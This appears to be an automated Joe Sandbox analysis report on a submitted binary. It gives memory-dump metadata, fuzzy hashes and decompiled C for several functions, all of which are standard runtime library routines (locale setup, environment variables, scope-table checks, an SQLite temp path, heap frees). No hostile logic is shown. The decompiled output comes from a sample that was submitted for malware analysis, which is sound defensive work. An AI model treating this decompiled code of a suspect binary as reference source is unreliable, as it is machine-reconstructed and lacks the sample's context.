                                    0x00000000
                                    0x0089170e
                                    0x00891710
                                    0x00891710
                                    0x00891712
                                    0x008917b8
                                    0x00891718
                                    0x00891718
                                    0x0089171b
                                    0x00891755
                                    0x00891757
                                    0x0089171d
                                    0x0089171d
                                    0x00891722
                                    0x00891722
                                    0x0089175a
                                    0x0089175c
                                    0x0089175e
                                    0x00891760
                                    0x00891763
                                    0x00891770
                                    0x0089177e
                                    0x00891785
                                    0x0089178c
                                    0x0089178e
                                    0x00891790
                                    0x00891791
                                    0x00891791
                                    0x00891795
                                    0x0089179a
                                    0x0089179a
                                    0x008917a0
                                    0x008917a3
                                    0x008917aa
                                    0x008917aa
                                    0x008917a3
                                    0x00000000
                                    0x00891712
                                    0x00000000
                                    0x008916eb
                                    0x008916d7
                                    0x0089168a
                                    0x00891693
                                    0x00891698
                                    0x0089169b
                                    0x0089169d
                                    0x00000000
                                    0x008916a3
                                    0x008916a3
                                    0x008916a7
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008916a7
                                    0x0089169d
                                    0x00891688
                                    0x0089167e
                                    0x00891667
                                    0x008914e6
                                    0x008914e6
                                    0x008914e6
                                    0x008914ec
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x008914ec
                                    0x008914e4
                                    0x00000000
                                    0x008914e0
                                    0x00000000
                                    0x008914b8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00891493
                                    0x00000000

                                    APIs
                                    • _ValidateScopeTableHandlers.LIBCMT ref: 00891554
                                    • __FindPESection.LIBCMT ref: 00891571
                                    • VirtualQuery.KERNEL32(83000000,@%#a,0000001C,61232540,?,?,?), ref: 00891656
                                    • __FindPESection.LIBCMT ref: 00891693
                                    • _ValidateScopeTableHandlers.LIBCMT ref: 008916B3
                                    • __FindPESection.LIBCMT ref: 008916CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
                                    • String ID: @%#a
                                    • API String ID: 2529200597-13247877
                                    • Opcode ID: cb73af39bc18c4575f6411ff6621c37b170ef58bb3a1e24d13a2ed7b92c0ef4a
                                    • Instruction ID: e60f826c98ee3460b46c1594b630eed4a814f6f699650cc86273bb4214e8c12c
                                    • Opcode Fuzzy Hash: cb73af39bc18c4575f6411ff6621c37b170ef58bb3a1e24d13a2ed7b92c0ef4a
                                    • Instruction Fuzzy Hash: 4EA1AF75E0821B9FDF11EF99D9886ADB7A5FB48310F1D4269D805E73A0E739EC108B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086280A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E0086280A(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr _t36;
				signed int _t45;
				intOrPtr _t51;
				intOrPtr _t52;
				signed int _t53;
				void* _t58;
				intOrPtr _t66;
				void* _t67;
				void* _t72;

				_t72 = __eflags;
				_t58 = __edx;
				_t52 = __ecx;
				_push(0x64);
				E0086E2F3(0x894d1a, __edi, __esi);
				_t51 = _t52;
				 *((intOrPtr*)(_t67 - 0x6c)) = E0087AAF8(_t58);
				_t32 = L0085AC0D(_t58, _t72, _t67 - 0x68);
				_t53 = 0xb;
				 *((intOrPtr*)(_t67 - 0x70)) = _t51;
				memcpy(_t67 - 0x3c, _t32, _t53 << 2);
				 *((intOrPtr*)(_t51 + 8)) = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((intOrPtr*)(_t51 + 0x14)) = 0;
				 *((intOrPtr*)(_t67 - 4)) = 0;
				L0085AC0D(_t58, _t72, _t67 - 0x68);
				_t36 = 0x8a43ab;
				_t66 =  *((intOrPtr*)(_t67 - 0x6c));
				if( *((char*)(_t67 + 0xc)) == 0) {
					_t36 =  *((intOrPtr*)(_t66 + 8));
				}
				_push(_t67 - 0x68);
				_push(0);
				 *((intOrPtr*)(_t51 + 8)) = L00856D62(_t36);
				 *((intOrPtr*)(_t51 + 0x10)) = E0085B848(_t51, 0, _t66, "false", 0, _t67 - 0x3c);
				 *((intOrPtr*)(_t51 + 0x14)) = E0085B848(_t51, 0, _t66, "true", 0, _t67 - 0x3c);
				if( *((char*)(_t67 + 0xc)) == 0) {
					 *((short*)(_t51 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x30))));
					_t45 =  *( *(_t66 + 0x34)) & 0x0000ffff;
				} else {
					 *((short*)(_t51 + 0xc)) = E0085B817(0x2e, 0, _t67 - 0x3c);
					_t45 = E0085B817(0x2c, 0, _t67 - 0x3c) & 0x0000ffff;
				}
				 *(_t51 + 0xe) = _t45;
				return E0086E2AE(_t45, 0, _t66);
			}













                                    0x0086280a
                                    0x0086280a
                                    0x0086280a
                                    0x0086280a
                                    0x00862811
                                    0x00862816
                                    0x0086281d
                                    0x00862824
                                    0x0086282b
                                    0x0086282e
                                    0x00862834
                                    0x00862838
                                    0x0086283b
                                    0x0086283e
                                    0x00862844
                                    0x00862848
                                    0x00862851
                                    0x00862856
                                    0x0086285b
                                    0x0086285d
                                    0x0086285d
                                    0x00862863
                                    0x00862864
                                    0x0086286b
                                    0x0086287d
                                    0x00862892
                                    0x00862899
                                    0x008628c5
                                    0x008628cc
                                    0x0086289b
                                    0x008628a7
                                    0x008628ba
                                    0x008628ba
                                    0x008628cf
                                    0x008628d8

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MaklocchrMaklocstr$H_prolog3_
                                    • String ID: false$true
                                    • API String ID: 2404127365-2658103896
                                    • Opcode ID: 640e639b7b1b441d955e7dcbc01b6ff7e3b750a22ca710dcb33f0596798d4693
                                    • Instruction ID: 7e95381dfad10b4ece116dfd5c78957313e344d398d91c1f193562f98b7a9f7c
                                    • Opcode Fuzzy Hash: 640e639b7b1b441d955e7dcbc01b6ff7e3b750a22ca710dcb33f0596798d4693
                                    • Instruction Fuzzy Hash: 522139B5D00348AADF14EFA9C885D9EBBB8FF55700F00806AF915DB252EB70D944CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00888881 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E00888881(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t116;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00890A90(_t146, 0x3d);
					_v20 = _t59;
					_pop(_t116);
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(L00873CA4(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x8b4388 - _t110; // 0x133e938
							if(__eflags != 0) {
								L14:
								_t64 =  *0x8b4388; // 0x133e938
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00888B89(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = L00872ED1(_t120, _t139, 4);
													E00880123(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00880123( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = L00872ED1(_t139, _t138, 4);
												E00880123(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x8b4388 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E008800C6(_t122, _t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00880123(_t149);
													goto L40;
												} else {
													_t76 = E0087F6D3(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00873556();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E008800C6(_t126, _t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																L0087CF95(_t110, _t128, _t139, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00880123(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E008800C6(_t130 - _t139, _t53, 1);
																		E00880123(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E0087F6D3( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00873556();
																				asm("int3");
																				_t84 =  *0x8b4388; // 0x133e938
																				__eflags = _t84 -  *0x8b4394; // 0x133e938
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x8b4388 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E0088F4F3(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = L00873CA4(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x8b4388 = E008800C6(_t116, 1, 4);
										E00880123(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x8b4388 - _t110; // 0x133e938
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x8b438c - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x8b438c = E008800C6(_t116, 1, 4);
												E00880123(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x8b438c - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00880123(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x8b438c - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L0087D7B0(0);
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = L00873CA4(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}











































                                    0x00888881
                                    0x00888884
                                    0x00888886
                                    0x0088888a
                                    0x0088888d
                                    0x0088888f
                                    0x008888a4
                                    0x008888a9
                                    0x008888ab
                                    0x008888b0
                                    0x008888b4
                                    0x008888b5
                                    0x008888b7
                                    0x00888a98
                                    0x00888a9d
                                    0x00000000
                                    0x008888bd
                                    0x008888bd
                                    0x008888bf
                                    0x00000000
                                    0x008888c5
                                    0x008888c8
                                    0x008888cb
                                    0x008888d0
                                    0x008888d2
                                    0x008888d8
                                    0x00888955
                                    0x00888955
                                    0x0088895a
                                    0x0088895d
                                    0x0088895f
                                    0x00000000
                                    0x00888965
                                    0x0088896c
                                    0x00888971
                                    0x00888976
                                    0x00888979
                                    0x0088897b
                                    0x008889cc
                                    0x008889cc
                                    0x008889cf
                                    0x00000000
                                    0x008889d5
                                    0x008889d5
                                    0x008889d7
                                    0x008889da
                                    0x008889da
                                    0x008889dd
                                    0x008889df
                                    0x00000000
                                    0x008889e5
                                    0x008889e5
                                    0x008889eb
                                    0x00000000
                                    0x008889f1
                                    0x008889fb
                                    0x008889fe
                                    0x00888a03
                                    0x00888a06
                                    0x00888a09
                                    0x00888a0b
                                    0x00000000
                                    0x00888a11
                                    0x00888a11
                                    0x00888a14
                                    0x00888a16
                                    0x00888a19
                                    0x00000000
                                    0x00888a19
                                    0x00888a0b
                                    0x008889eb
                                    0x008889df
                                    0x0088897d
                                    0x0088897d
                                    0x0088897f
                                    0x00000000
                                    0x00888981
                                    0x00888984
                                    0x0088898a
                                    0x0088898d
                                    0x00888990
                                    0x008889c5
                                    0x008889c7
                                    0x00888992
                                    0x00888992
                                    0x0088899f
                                    0x0088899f
                                    0x008889a2
                                    0x00000000
                                    0x00000000
                                    0x0088899b
                                    0x0088899e
                                    0x0088899e
                                    0x0088899e
                                    0x008889ae
                                    0x008889b1
                                    0x008889b6
                                    0x008889b9
                                    0x008889bc
                                    0x008889be
                                    0x00888a1d
                                    0x00888a1d
                                    0x00888a1d
                                    0x008889be
                                    0x00888a22
                                    0x00888a25
                                    0x00000000
                                    0x00888a27
                                    0x00888a27
                                    0x00888a2a
                                    0x00888a2a
                                    0x00888a2c
                                    0x00888a2d
                                    0x00888a2d
                                    0x00888a39
                                    0x00888a41
                                    0x00888a44
                                    0x00888a45
                                    0x00888a47
                                    0x00888a8f
                                    0x00888a90
                                    0x00000000
                                    0x00888a49
                                    0x00888a50
                                    0x00888a55
                                    0x00888a58
                                    0x00888a5a
                                    0x00888ab4
                                    0x00888ab5
                                    0x00888ab6
                                    0x00888ab7
                                    0x00888ab8
                                    0x00888ab9
                                    0x00888abe
                                    0x00888ac1
                                    0x00888ac5
                                    0x00888ac6
                                    0x00888ac9
                                    0x00888acb
                                    0x00888ad2
                                    0x00888ad4
                                    0x00888ad6
                                    0x00888ad8
                                    0x00888ada
                                    0x00888ada
                                    0x00888add
                                    0x00888ade
                                    0x00888ade
                                    0x00888ada
                                    0x00888ae4
                                    0x00888aef
                                    0x00888af2
                                    0x00888af3
                                    0x00888af5
                                    0x00888b5d
                                    0x00888b5d
                                    0x00000000
                                    0x00888af7
                                    0x00888af7
                                    0x00888af9
                                    0x00888afb
                                    0x00888b4d
                                    0x00888b4f
                                    0x00888b55
                                    0x00000000
                                    0x00888afd
                                    0x00888afd
                                    0x00888b00
                                    0x00888b00
                                    0x00888b02
                                    0x00888b02
                                    0x00888b02
                                    0x00888b05
                                    0x00888b05
                                    0x00888b07
                                    0x00888b08
                                    0x00888b08
                                    0x00888b10
                                    0x00888b14
                                    0x00888b1e
                                    0x00888b21
                                    0x00888b26
                                    0x00888b29
                                    0x00888b2d
                                    0x00000000
                                    0x00888b2f
                                    0x00888b37
                                    0x00888b3c
                                    0x00888b3f
                                    0x00888b41
                                    0x00888b62
                                    0x00888b64
                                    0x00888b65
                                    0x00888b66
                                    0x00888b67
                                    0x00888b68
                                    0x00888b69
                                    0x00888b6e
                                    0x00888b6f
                                    0x00888b74
                                    0x00888b7a
                                    0x00888b7c
                                    0x00888b7d
                                    0x00888b83
                                    0x00000000
                                    0x00888b83
                                    0x00888b88
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00888b41
                                    0x00000000
                                    0x00888b43
                                    0x00888b43
                                    0x00888b46
                                    0x00888b48
                                    0x00888b48
                                    0x00000000
                                    0x00888b4c
                                    0x00888afb
                                    0x00888acd
                                    0x00888acd
                                    0x00888acd
                                    0x00888acf
                                    0x00888ad1
                                    0x00888ad1
                                    0x00888a5c
                                    0x00888a6d
                                    0x00888a71
                                    0x00888a7d
                                    0x00888a7f
                                    0x00888a81
                                    0x00888a86
                                    0x00888a86
                                    0x00888a89
                                    0x00888a89
                                    0x00000000
                                    0x00888a7f
                                    0x00888a5a
                                    0x00888a47
                                    0x00888a25
                                    0x0088897f
                                    0x0088897b
                                    0x008888da
                                    0x008888da
                                    0x008888dd
                                    0x008888fb
                                    0x008888fb
                                    0x008888fe
                                    0x00888911
                                    0x00888916
                                    0x0088891b
                                    0x0088891e
                                    0x00888924
                                    0x00888aa3
                                    0x00888aa3
                                    0x00888aa3
                                    0x00000000
                                    0x0088892a
                                    0x0088892a
                                    0x00888930
                                    0x00000000
                                    0x00888932
                                    0x0088893c
                                    0x00888941
                                    0x00888946
                                    0x00888949
                                    0x0088894f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0088894f
                                    0x00888930
                                    0x00888900
                                    0x00888900
                                    0x00888aa6
                                    0x00888aa7
                                    0x00888aae
                                    0x00000000
                                    0x00888ab0
                                    0x008888df
                                    0x008888df
                                    0x008888e5
                                    0x00000000
                                    0x008888e7
                                    0x008888ec
                                    0x008888ee
                                    0x00000000
                                    0x008888f4
                                    0x008888f4
                                    0x00000000
                                    0x008888f4
                                    0x008888ee
                                    0x008888e5
                                    0x008888dd
                                    0x008888d8
                                    0x008888bf
                                    0x00888891
                                    0x00888891
                                    0x00888896
                                    0x0088889c
                                    0x00888ab1
                                    0x00888ab3
                                    0x00888ab3
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 3409252457-0
                                    • Opcode ID: 836e9d499b03553bc7e2b5c88024ba38cdcbebb292cdac8d2926b6019340f7f5
                                    • Instruction ID: c71f9b565cc10810c29d80c96d7a87b766b745815e8712d968cceb5b7fddf091
                                    • Opcode Fuzzy Hash: 836e9d499b03553bc7e2b5c88024ba38cdcbebb292cdac8d2926b6019340f7f5
                                    • Instruction Fuzzy Hash: DD51D271904316EFDF24BFB89C82A6DBBE8FF05364B54416AE514E72C2EE3189408B53
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008118A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::locale::_Init.LIBCPMT ref: 008118B7
                                      • Part of subcall function 0085A7A9: std::_Lockit::_Lockit.LIBCPMT ref: 0085A7BB
                                      • Part of subcall function 0085A7A9: std::locale::_Setgloballocale.LIBCPMT ref: 0085A7D6
                                      • Part of subcall function 0085A7A9: _Yarn.LIBCPMT ref: 0085A7EC
                                      • Part of subcall function 0085A7A9: std::_Lockit::~_Lockit.LIBCPMT ref: 0085A82C
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 008118D8
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0081191C
                                    • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00811952
                                      • Part of subcall function 00858FBF: int.LIBCPMT ref: 00858FE1
                                      • Part of subcall function 00858FBF: ctype.LIBCPMT ref: 00859001
                                      • Part of subcall function 00858FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0085900D
                                      • Part of subcall function 00858FBF: int.LIBCPMT ref: 00859037
                                      • Part of subcall function 00858FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00859065
                                      • Part of subcall function 00858FBF: int.LIBCPMT ref: 00859072
                                      • Part of subcall function 00858FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00859099
                                      • Part of subcall function 00858FBF: int.LIBCPMT ref: 008590A6
                                      • Part of subcall function 00858FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 008590ED
                                      • Part of subcall function 00858FBF: int.LIBCPMT ref: 0085914D
                                    • _Yarn.LIBCPMT ref: 0081196F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$Lockit::_Yarn$InitLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocalectype
                                    • String ID: bad locale name
                                    • API String ID: 2393377010-1405518554
                                    • Opcode ID: 30560f81078b39936ea856f037c095c68c25bde01396e1953d2ffdaad774c02c
                                    • Instruction ID: 5cbf9e1df93917b4e68590480f92fe2fa1676a758da4ad89248f6371f2a63639
                                    • Opcode Fuzzy Hash: 30560f81078b39936ea856f037c095c68c25bde01396e1953d2ffdaad774c02c
                                    • Instruction Fuzzy Hash: DD417B70D00248EFDF04DFA8D485ADDBBB8FF19304F544169E555E7282D7709A44CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008337DD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen$PathTemp
                                    • String ID: %s\etilqs_$\
                                    • API String ID: 1134129140-699725532
                                    • Opcode ID: 3c54fa344722d8194a993f38d86e22f4070a3c96d63cd2f0c20d23f604167f86
                                    • Instruction ID: 8c67f4d67779bc261276ba29f4e29e8d72e2d09b55d3855e3398c3a9cc8fa46c
                                    • Opcode Fuzzy Hash: 3c54fa344722d8194a993f38d86e22f4070a3c96d63cd2f0c20d23f604167f86
                                    • Instruction Fuzzy Hash: 0A3149719046599EEB10E628DC45EFB37ACFFD1710F1404B9F445C2181EEB0CB4486A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087F9B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: 4c3d917e04de8bd1debebcb2055214a4fb029820e7d2a89c83e501accf5d0db2
                                    • Instruction ID: 3b41548514cb8c417a5818da328b16863fba9fb826adb23aae651bfdfce84fe1
                                    • Opcode Fuzzy Hash: 4c3d917e04de8bd1debebcb2055214a4fb029820e7d2a89c83e501accf5d0db2
                                    • Instruction Fuzzy Hash: BF21BE32A05335E7DB21976A9C41B6AB798FF057A8F158131EE1EE7296E730DD00C6E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00889BFD Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00889949: _free.LIBCMT ref: 0088996E
                                    • _free.LIBCMT ref: 00889C4B
                                      • Part of subcall function 00880123: RtlFreeHeap.NTDLL(00000000,00000000,?,0087DA9C), ref: 00880139
